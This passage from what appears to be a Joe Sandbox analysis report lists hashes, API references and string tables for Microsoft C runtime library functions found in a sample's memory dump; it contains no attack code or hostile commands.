Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: 0411E97B247291C3D6C28B3DD4B0EF6A795EAC522576B8377D0514B754F123F2479600

Function 6FDF6B70 Relevance: 70.4, APIs: 11, Strings: 29, Instructions: 359
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

shared_ptr.LIBCMT ref: 6FDF6BE3
shared_ptr.LIBCMT ref: 6FDF6C2B
shared_ptr.LIBCMT ref: 6FDF6C4A
operator+.LIBVCRUNTIME ref: 6FDF6D78
DName::operator=.LIBVCRUNTIME ref: 6FDF6D8A
shared_ptr.LIBCMT ref: 6FDF6FCF
DName::operator+.LIBCMT ref: 6FDF7011
operator+.LIBVCRUNTIME ref: 6FDF7057

Strings

char32_t, xrefs: 6FDF6F15
const, xrefs: 6FDF6E7B
char16_t, xrefs: 6FDF6F09
void, xrefs: 6FDF6C73
UNKNOWN, xrefs: 6FDF6FBA
int, xrefs: 6FDF6BFD
signed , xrefs: 6FDF6CD8
float, xrefs: 6FDF6C16
volatile, xrefs: 6FDF6EB9
wchar_t, xrefs: 6FDF6F21
__int128, xrefs: 6FDF6DB1
short, xrefs: 6FDF6BED
__w64 , xrefs: 6FDF6D66
double, xrefs: 6FDF6C52
this , xrefs: 6FDF6F57
__int64, xrefs: 6FDF6DC4
auto, xrefs: 6FDF6F2D
long, xrefs: 6FDF6C0D
decltype(auto), xrefs: 6FDF6F39
<unknown>, xrefs: 6FDF6EEA
long , xrefs: 6FDF6C38
unsigned , xrefs: 6FDF6FF0
__int8, xrefs: 6FDF6D45
__int32, xrefs: 6FDF6DD0
char8_t, xrefs: 6FDF6EFD
char, xrefs: 6FDF6BCE
bool, xrefs: 6FDF6DDC
volatile, xrefs: 6FDF6E99
__int16, xrefs: 6FDF6D39

Memory Dump Source

Source File: 00000012.00000002.1697486619.000000006FDF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FDF0000, based on PE: true

Associated: 00000012.00000002.1697459893.000000006FDF0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1697518937.000000006FE01000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1697542069.000000006FE02000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_6fdf0000_Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.jbxd

Similarity

API ID: shared_ptr$operator+$Name::operator+Name::operator=
String ID: volatile$<unknown>$UNKNOWN$__int128$__int16$__int32$__int64$__int8$__w64 $auto$bool$char$char16_t$char32_t$char8_t$const$decltype(auto)$double$float$int$long$long $short$signed $this $unsigned $void$volatile$wchar_t
API String ID: 1464150960-1482988683
Opcode ID: 102cfd2fa03c6bb1fd4dc1dd1325b04c708fd1b7de8f503338d0478b823f623f
Instruction ID: e33955cee1d06151cc4c3a6b4120e1dbfc01e6afe2d37eb2f1d2347aacfb0676
Opcode Fuzzy Hash: 102cfd2fa03c6bb1fd4dc1dd1325b04c708fd1b7de8f503338d0478b823f623f
Instruction Fuzzy Hash: 7CE15EB6C0620ADACB84CFA8C555FEEBBB8EF46304F12821AD511A7680D7357647CF91

Function 6FDFA3CA Relevance: 31.8, APIs: 12, Strings: 6, Instructions: 297
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DName::operator+.LIBCMT ref: 6FDFA4A0
UnDecorator::getSignedDimension.LIBCMT ref: 6FDFA4AB
UnDecorator::getSignedDimension.LIBCMT ref: 6FDFA597
UnDecorator::getSignedDimension.LIBCMT ref: 6FDFA5B4
UnDecorator::getSignedDimension.LIBCMT ref: 6FDFA5D1
DName::operator+.LIBCMT ref: 6FDFA5E6
UnDecorator::getSignedDimension.LIBCMT ref: 6FDFA600
atol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,00000010,00000002,00000000,0000002C,00000000,0000007B,00000000,?,00000000), ref: 6FDFA621
__telemetry_main_return_trigger.VCRUNTIME140(00000000), ref: 6FDFA648
swprintf.LIBCMT ref: 6FDFA67B
DName::operator+.LIBCMT ref: 6FDFA6D6

Part of subcall function 6FDF6595: DName::DName.LIBVCRUNTIME ref: 6FDF65F3

DName::DName.LIBVCRUNTIME ref: 6FDFA74D

Strings

`generic-method-parameter-, xrefs: 6FDFA6B2
`generic-class-parameter-, xrefs: 6FDFA6E2
nullptr, xrefs: 6FDFA716
lambda, xrefs: 6FDFA736
NULL, xrefs: 6FDFA45E
`template-type-parameter-, xrefs: 6FDFA6F2

Memory Dump Source

Source File: 00000012.00000002.1697486619.000000006FDF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FDF0000, based on PE: true

Associated: 00000012.00000002.1697459893.000000006FDF0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1697518937.000000006FE01000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1697542069.000000006FE02000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_6fdf0000_Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.jbxd

Similarity

API ID: Decorator::getDimensionSigned$Name::operator+$NameName::$__telemetry_main_return_triggeratolswprintf
String ID: NULL$`generic-class-parameter-$`generic-method-parameter-$`template-type-parameter-$lambda$nullptr
API String ID: 1551792257-2441609178
Opcode ID: 5739013eefef8b0a56b790c76ed8ac9dc98eea95788d2691a1c21bd7ec2964b5
Instruction ID: 3039ec48cfc2e4e536108f3761c86ade66ebf1ab1259a0d6347259fe3f75a11b
Opcode Fuzzy Hash: 5739013eefef8b0a56b790c76ed8ac9dc98eea95788d2691a1c21bd7ec2964b5
Instruction Fuzzy Hash: 7A91D776C0630AD9DB85CFF8D988FEE7B78AF06304F52451AD115A62C0DB39BA078761

Function 6FDF98A5 Relevance: 24.8, APIs: 13, Strings: 1, Instructions: 305
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DName::operator+.LIBCMT ref: 6FDF9910
DName::operator+.LIBCMT ref: 6FDF9A53

Part of subcall function 6FDF55D8: shared_ptr.LIBCMT ref: 6FDF55F4

DName::operator+.LIBCMT ref: 6FDF99FE
DName::operator+.LIBCMT ref: 6FDF9A9F
DName::operator+.LIBCMT ref: 6FDF9AAE
DName::operator+.LIBCMT ref: 6FDF9BDA
DName::operator=.LIBVCRUNTIME ref: 6FDF9C1A
DName::DName.LIBVCRUNTIME ref: 6FDF9C24
DName::operator+.LIBCMT ref: 6FDF9C41
DName::operator+.LIBCMT ref: 6FDF9C4D

Part of subcall function 6FDFB175: Replicator::operator[].LIBCMT ref: 6FDFB1B2

Strings

`anonymous namespace', xrefs: 6FDF9B5F

Memory Dump Source

Source File: 00000012.00000002.1697486619.000000006FDF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FDF0000, based on PE: true

Associated: 00000012.00000002.1697459893.000000006FDF0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1697518937.000000006FE01000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1697542069.000000006FE02000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_6fdf0000_Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.jbxd

Similarity

API ID: Name::operator+$NameName::Name::operator=Replicator::operator[]shared_ptr
String ID: `anonymous namespace'
API String ID: 1043660730-3062148218
Opcode ID: 031347083e7f8b68ea2133fe22e985fff4c14ff1dff3bfb2e2021420c87c1dc2
Instruction ID: 0d5299d5e05f5018a16abdb14d2ba0f2c9fce54a98caf8ffd5fbb440a8619389
Opcode Fuzzy Hash: 031347083e7f8b68ea2133fe22e985fff4c14ff1dff3bfb2e2021420c87c1dc2
Instruction Fuzzy Hash: 4AC18E75D05309DFDB51CFA8C880FEABBF8AB0A304F01445EE145AB284EB35B64ACB11

Function 6FDFB175 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 185
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Replicator::operator[].LIBCMT ref: 6FDFB1B2

Strings

`template-parameter-, xrefs: 6FDFB223
template-parameter-, xrefs: 6FDFB211
@, xrefs: 6FDFB31F
generic-type-, xrefs: 6FDFB238
`generic-type-, xrefs: 6FDFB24E

Memory Dump Source

Source File: 00000012.00000002.1697486619.000000006FDF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FDF0000, based on PE: true

Associated: 00000012.00000002.1697459893.000000006FDF0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1697518937.000000006FE01000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1697542069.000000006FE02000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_6fdf0000_Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.jbxd

Similarity

API ID: Replicator::operator[]
String ID: @$`generic-type-$`template-parameter-$generic-type-$template-parameter-
API String ID: 3676697650-3433397351
Opcode ID: f3583ea28a53c1f81483ed01e52150a432b7541807fc38024795e8fc255e8735
Instruction ID: 73b6449c005e1dfe0fa6dbc52c8e0459e414c9d20514f266537597c4b28f7ea4
Opcode Fuzzy Hash: f3583ea28a53c1f81483ed01e52150a432b7541807fc38024795e8fc255e8735
Instruction Fuzzy Hash: 36617F71D4570ADBDB40DFA8D840FEEBBB8AF4A354F12411AE511A72D0DB34B616CBA0

Function 6FDF82EF Relevance: 19.8, APIs: 13, Instructions: 332
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DName::operator+.LIBCMT ref: 6FDF83B8
DName::operator+.LIBCMT ref: 6FDF83F5
DName::DName.LIBVCRUNTIME ref: 6FDF8409
DName::operator+.LIBCMT ref: 6FDF8418
DName::operator+.LIBCMT ref: 6FDF84A6
DName::DName.LIBVCRUNTIME ref: 6FDF84CE
DName::operator+.LIBCMT ref: 6FDF84DC
DName::operator+.LIBCMT ref: 6FDF8516
DName::operator+.LIBCMT ref: 6FDF8557
UnDecorator::getReturnType.LIBCMT ref: 6FDF8587
operator+.LIBVCRUNTIME ref: 6FDF8689

Memory Dump Source

Source File: 00000012.00000002.1697486619.000000006FDF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FDF0000, based on PE: true

Associated: 00000012.00000002.1697459893.000000006FDF0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1697518937.000000006FE01000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1697542069.000000006FE02000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_6fdf0000_Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.jbxd

Similarity

API ID: Name::operator+$NameName::$Decorator::getReturnTypeoperator+
String ID:
API String ID: 2932655852-0
Opcode ID: a8d6205ef12f81ddbd9623117241387df34fa4694bcda47ea23a9fb7e8b49981
Instruction ID: a9016b9ee9a683a47bccdf7142eefdde6a35851498fcce6ec82e995d26302a27
Opcode Fuzzy Hash: a8d6205ef12f81ddbd9623117241387df34fa4694bcda47ea23a9fb7e8b49981
Instruction Fuzzy Hash: 56C19175D06309AFCB45CFA8D890EEE7BB8AB05314F02415EE552A72D0DB34BA46CB61

Function 6FDF7D06 Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 131
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DName::operator+.LIBCMT ref: 6FDF7D39

Part of subcall function 6FDF55B6: DName::operator+=.LIBCMT ref: 6FDF55CC

Strings

class , xrefs: 6FDF7E5A
enum , xrefs: 6FDF7E26
cointerface , xrefs: 6FDF7DFA
struct , xrefs: 6FDF7E63
union , xrefs: 6FDF7E73
coclass , xrefs: 6FDF7E0A
`unknown ecsu', xrefs: 6FDF7D1B

Memory Dump Source

Source File: 00000012.00000002.1697486619.000000006FDF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FDF0000, based on PE: true

Associated: 00000012.00000002.1697459893.000000006FDF0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1697518937.000000006FE01000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1697542069.000000006FE02000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_6fdf0000_Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.jbxd

Similarity

API ID: Name::operator+Name::operator+=
String ID: `unknown ecsu'$class $coclass $cointerface $enum $struct $union
API String ID: 382699925-1464470183
Opcode ID: 1656a2c1f41b9ddd7aa2e0ca3e864ebddaf11b4893005b37d645e2fbc00e1b23
Instruction ID: 6c8db7027b30929e55e779e20c6ce485b73ec342e0f2089a002f88adc15276dc
Opcode Fuzzy Hash: 1656a2c1f41b9ddd7aa2e0ca3e864ebddaf11b4893005b37d645e2fbc00e1b23
Instruction Fuzzy Hash: 6A414E76D0230AEACB44CFA8D981EEEBFB9AF45314F11411AD515AB340D735BA46CBA0

Function 6FDF3108 Relevance: 17.8, APIs: 7, Strings: 3, Instructions: 302
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

type_info::operator==.LIBVCRUNTIME ref: 6FDF3223
terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0(6FE010A4), ref: 6FDF323E
___TypeMatch.LIBVCRUNTIME ref: 6FDF3331
__DestructExceptionObject.VCRUNTIME140(?,00000001), ref: 6FDF33B5
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6FDF343C
__DestructExceptionObject.VCRUNTIME140(?,00000001,6FE010A4), ref: 6FDF344A
_CxxThrowException.VCRUNTIME140(?,6FDFFBC4,6FE010A4), ref: 6FDF3462

Strings

csm, xrefs: 6FDF325A
csm, xrefs: 6FDF3145
csm, xrefs: 6FDF31B2

Memory Dump Source

Source File: 00000012.00000002.1697486619.000000006FDF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FDF0000, based on PE: true

Associated: 00000012.00000002.1697459893.000000006FDF0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1697518937.000000006FE01000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1697542069.000000006FE02000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_6fdf0000_Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.jbxd

Similarity

API ID: Exception$DestructObject$MatchThrowTypeabortterminatetype_info::operator==
String ID: csm$csm$csm
API String ID: 2807342543-393685449
Opcode ID: dc845bf8b2455021a58262d922a4f74fd6854244c5387b54e370d5ddf31a42e6
Instruction ID: 947841f03fd1a27e16a6d612701cd5616b9b18f952301f0c659e181d424963dd
Opcode Fuzzy Hash: dc845bf8b2455021a58262d922a4f74fd6854244c5387b54e370d5ddf31a42e6
Instruction Fuzzy Hash: 3AB16A75802309EFCF85DFA4C981D9EBBB5BF05318B53415AE815AB241C731FA52CBA2

Function 6FDF9291 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 178
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

shared_ptr.LIBCMT ref: 6FDF92FC
operator+.LIBVCRUNTIME ref: 6FDF934C
shared_ptr.LIBCMT ref: 6FDF9418
DName::DName.LIBVCRUNTIME ref: 6FDF9448
operator+.LIBVCRUNTIME ref: 6FDF94A9

Strings

volatile , xrefs: 6FDF92DE, 6FDF93FA
std::nullptr_t, xrefs: 6FDF94BA
std::nullptr_t , xrefs: 6FDF9497
volatile, xrefs: 6FDF92EE, 6FDF940A

Memory Dump Source

Source File: 00000012.00000002.1697486619.000000006FDF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FDF0000, based on PE: true

Associated: 00000012.00000002.1697459893.000000006FDF0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1697518937.000000006FE01000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1697542069.000000006FE02000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_6fdf0000_Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.jbxd

Similarity

API ID: operator+shared_ptr$NameName::
String ID: std::nullptr_t$std::nullptr_t $volatile$volatile
API String ID: 2894330373-757766384
Opcode ID: a939b506543a89c315c9216c75969d121ea9a2ade08742217aa53100fd7a7d78
Instruction ID: 5c5201d34f8d77aa7a80e67bdb4616cb04e8e48f7ba82b8f060e39faec6e9db2
Opcode Fuzzy Hash: a939b506543a89c315c9216c75969d121ea9a2ade08742217aa53100fd7a7d78
Instruction Fuzzy Hash: 72618175C0620AEBCF44DFA8C844EED7BB4FB46318F02825AE4549A254D736B207CB55

Function 6FDF44F0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 131
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PMDtoOffset.LIBCMT ref: 6FDF4582

Strings

Bad read pointer - no RTTI data!, xrefs: 6FDF462A
Attempted a typeid of nullptr pointer!, xrefs: 6FDF465E
Bad dynamic_cast!, xrefs: 6FDF45C4

Memory Dump Source

Source File: 00000012.00000002.1697486619.000000006FDF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FDF0000, based on PE: true

Associated: 00000012.00000002.1697459893.000000006FDF0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1697518937.000000006FE01000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1697542069.000000006FE02000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_6fdf0000_Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.jbxd

Similarity

API ID: Offset
String ID: Attempted a typeid of nullptr pointer!$Bad dynamic_cast!$Bad read pointer - no RTTI data!
API String ID: 1587990502-2941716148
Opcode ID: 81c0e74cffb284a816101c243d1bed1b72f71bf4f2809c4c02358903d53355dc
Instruction ID: fed3b5f9a04fc2194b3bbf763c4ba3aeea0c782ee9bef24bfde0f26b0fed089d
Opcode Fuzzy Hash: 81c0e74cffb284a816101c243d1bed1b72f71bf4f2809c4c02358903d53355dc
Instruction Fuzzy Hash: FF31B576A06305EFDB44DFA8DB45E9D73B4FB86324F124659E9109B2C0D731FA078660

Function 6FDF94DF Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 113COMMONLIBRARYCODE

Download Yara Rule

APIs

operator+.LIBVCRUNTIME ref: 6FDF9542
DName::operator+.LIBCMT ref: 6FDF9600
operator+.LIBVCRUNTIME ref: 6FDF963F

Strings

cli::pin_ptr<, xrefs: 6FDF9616
cli::array<, xrefs: 6FDF95DC
void, xrefs: 6FDF950D
std::nullptr_t, xrefs: 6FDF9586
void , xrefs: 6FDF952C
std::nullptr_t , xrefs: 6FDF9596

Memory Dump Source

Source File: 00000012.00000002.1697486619.000000006FDF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FDF0000, based on PE: true

Associated: 00000012.00000002.1697459893.000000006FDF0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1697518937.000000006FE01000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1697542069.000000006FE02000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_6fdf0000_Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.jbxd

Similarity

API ID: operator+$Name::operator+
String ID: cli::array<$cli::pin_ptr<$std::nullptr_t$std::nullptr_t $void$void
API String ID: 1198235884-2239912363
Opcode ID: 89ffbf4dfcb491da8027f7456a0a2762d8839fd4f1c60ec3f7585115c5df24f5
Instruction ID: dcedee7f8a06704882f99cd23b689e2fbedcde07ffd06b84a388ccf5d16b8eb5
Opcode Fuzzy Hash: 89ffbf4dfcb491da8027f7456a0a2762d8839fd4f1c60ec3f7585115c5df24f5
Instruction Fuzzy Hash: 374148B1C06309EFDF85CFA8C845FAE7BB5AF42318F02814AE5549B284D775B64ACB41

Function 6FDF7EB0 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 73COMMONLIBRARYCODE

Download Yara Rule

APIs

shared_ptr.LIBCMT ref: 6FDF7F21
DName::operator+.LIBCMT ref: 6FDF7F69
DName::DName.LIBVCRUNTIME ref: 6FDF7F99

Strings

long , xrefs: 6FDF7F0C
unsigned , xrefs: 6FDF7F48
short , xrefs: 6FDF7EEC
int , xrefs: 6FDF7EFC
char , xrefs: 6FDF7EE3

Memory Dump Source

Source File: 00000012.00000002.1697486619.000000006FDF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FDF0000, based on PE: true

Associated: 00000012.00000002.1697459893.000000006FDF0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1697518937.000000006FE01000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1697542069.000000006FE02000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_6fdf0000_Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.jbxd

Similarity

API ID: NameName::Name::operator+shared_ptr
String ID: char $int $long $short $unsigned
API String ID: 3919194733-3894466517
Opcode ID: 9f4ba9543615b5ecaf5dc07d971a9bd0610b1f962c82dc38fe69b4763764f7e3
Instruction ID: e42a663af3e345713d32c354bb7e7a3b569da8d41f07966af2b4f337d23ac455
Opcode Fuzzy Hash: 9f4ba9543615b5ecaf5dc07d971a9bd0610b1f962c82dc38fe69b4763764f7e3
Instruction Fuzzy Hash: 5A211975901209EFCB44CFA8C951FEEBBB4FF06319F01868AE421AB384D775A606CB50

Function 6FDFB021 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 119COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBCMT ref: 6FDFB065
DName::operator+.LIBCMT ref: 6FDFB071

Part of subcall function 6FDF55D8: shared_ptr.LIBCMT ref: 6FDF55F4

DName::operator+=.LIBCMT ref: 6FDFB12F

Part of subcall function 6FDF98A5: DName::operator+.LIBCMT ref: 6FDF9910
Part of subcall function 6FDF98A5: DName::operator+.LIBCMT ref: 6FDF9BDA

Part of subcall function 6FDF5503: DName::operator+.LIBCMT ref: 6FDF5524

DName::operator+.LIBCMT ref: 6FDFB0EC

Part of subcall function 6FDF5630: DName::operator=.LIBVCRUNTIME ref: 6FDF5651

DName::DName.LIBVCRUNTIME ref: 6FDFB153
DName::operator+.LIBCMT ref: 6FDFB15F

Strings

{for , xrefs: 6FDFB098

Memory Dump Source

Source File: 00000012.00000002.1697486619.000000006FDF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FDF0000, based on PE: true

Associated: 00000012.00000002.1697459893.000000006FDF0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1697518937.000000006FE01000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1697542069.000000006FE02000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_6fdf0000_Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.jbxd

Similarity

API ID: Name::operator+$NameName::Name::operator+=Name::operator=shared_ptr
String ID: {for
API String ID: 2795783184-864106941
Opcode ID: 5c09b7011d17175d4820603034fb41d2b31d2ca1e5ac83dca66913eeba793e8d
Instruction ID: 90b356e5bfb93af2d6fd5072d9b06868651c905847a85653157d226a922fb4c4
Opcode Fuzzy Hash: 5c09b7011d17175d4820603034fb41d2b31d2ca1e5ac83dca66913eeba793e8d
Instruction Fuzzy Hash: 404191B1A01349EFDB41DFA8C850F9E7BEAAB0B308F024459E196DB2C0D7397946C764

Function 6FDFA796 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 96COMMONLIBRARYCODE

Download Yara Rule

APIs

UnDecorator::getSignedDimension.LIBCMT ref: 6FDFA7E7
atol.API-MS-WIN-CRT-CONVERT-L1-1-0(6FDFA18F,6FDFA18F,00000010,?,00000000,00000000,?,?,?,?,?,?,6FDFA18F,?,?,00000000), ref: 6FDFA825
__telemetry_main_return_trigger.VCRUNTIME140(00000000,?,?,?,?,?,6FDFA18F,?,?,00000000,00000000), ref: 6FDFA82F

Strings

`template-parameter, xrefs: 6FDFA852
void, xrefs: 6FDFA7B7

Memory Dump Source

Source File: 00000012.00000002.1697486619.000000006FDF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FDF0000, based on PE: true

Associated: 00000012.00000002.1697459893.000000006FDF0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1697518937.000000006FE01000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1697542069.000000006FE02000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_6fdf0000_Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.jbxd

Similarity

API ID: Decorator::getDimensionSigned__telemetry_main_return_triggeratol
String ID: `template-parameter$void
API String ID: 3224638273-4057429177
Opcode ID: 71bb7498c18879cf3d27803b231292a39ef11d10231b3e13238fd659aba910d1
Instruction ID: 54b62f931e5c8b16dc078b52f4511a8f23263dad7448903d812e31274807a33a
Opcode Fuzzy Hash: 71bb7498c18879cf3d27803b231292a39ef11d10231b3e13238fd659aba910d1
Instruction Fuzzy Hash: 13318071D01309DFEF44CBE4D844FEEBBB9AB49318F11402EE501A6180DB797A1A8B75

Function 6FDF670A Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 80COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 6FDF65FD: Replicator::operator[].LIBCMT ref: 6FDF6669

DName::DName.LIBVCRUNTIME ref: 6FDF6756
DName::operator+.LIBCMT ref: 6FDF679C

Strings

,..., xrefs: 6FDF6777
void, xrefs: 6FDF67EE
<ellipsis>, xrefs: 6FDF67DD
..., xrefs: 6FDF67CD
,<ellipsis>, xrefs: 6FDF6787

Memory Dump Source

Source File: 00000012.00000002.1697486619.000000006FDF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FDF0000, based on PE: true

Associated: 00000012.00000002.1697459893.000000006FDF0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1697518937.000000006FE01000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1697542069.000000006FE02000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_6fdf0000_Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.jbxd

Similarity

API ID: NameName::Name::operator+Replicator::operator[]
String ID: ,...$,<ellipsis>$...$<ellipsis>$void
API String ID: 583996491-2211150622
Opcode ID: 965adb7be0a8dc35f573ed2c684d59748d354c0d0638e322f73141fb18acbf44
Instruction ID: d27bbe04f35c9e694686fd6b82c86667f9f199d104ad68e533c97144ebe48030
Opcode Fuzzy Hash: 965adb7be0a8dc35f573ed2c684d59748d354c0d0638e322f73141fb18acbf44
Instruction Fuzzy Hash: 543128B8901309DFCF84CFA8C460BAE7BB4BB47348F018649D565DBA50C735B616CB40

Function 6FDF4AF8 Relevance: 12.1, APIs: 8, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,6FDF4AED,6FDF2CB8), ref: 6FDF4B06
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6FDF4B14
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6FDF4B2D
SetLastError.KERNEL32(00000000,?,6FDF4AED,6FDF2CB8), ref: 6FDF4B81

Memory Dump Source

Source File: 00000012.00000002.1697486619.000000006FDF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FDF0000, based on PE: true

Associated: 00000012.00000002.1697459893.000000006FDF0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1697518937.000000006FE01000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1697542069.000000006FE02000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_6fdf0000_Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 2b7c5934a89fa31bf9815648a6ac6ccb9557d99fb3191f92f48327357b3c4dc8
Instruction ID: 383d05888ba4e118b285b2d5d1bf5d83129dc01b521f86d7c0ea3e8cc18a8bb8
Opcode Fuzzy Hash: 2b7c5934a89fa31bf9815648a6ac6ccb9557d99fb3191f92f48327357b3c4dc8
Instruction Fuzzy Hash: 4401963210BB219EEB8517F4EE88F563E96FB033F9712022DF5548A0D1EB527422D158

Function 6FDF6924 Relevance: 10.7, APIs: 7, Instructions: 151COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBCMT ref: 6FDF69B2
DName::operator+.LIBCMT ref: 6FDF6A05

Part of subcall function 6FDF55D8: shared_ptr.LIBCMT ref: 6FDF55F4

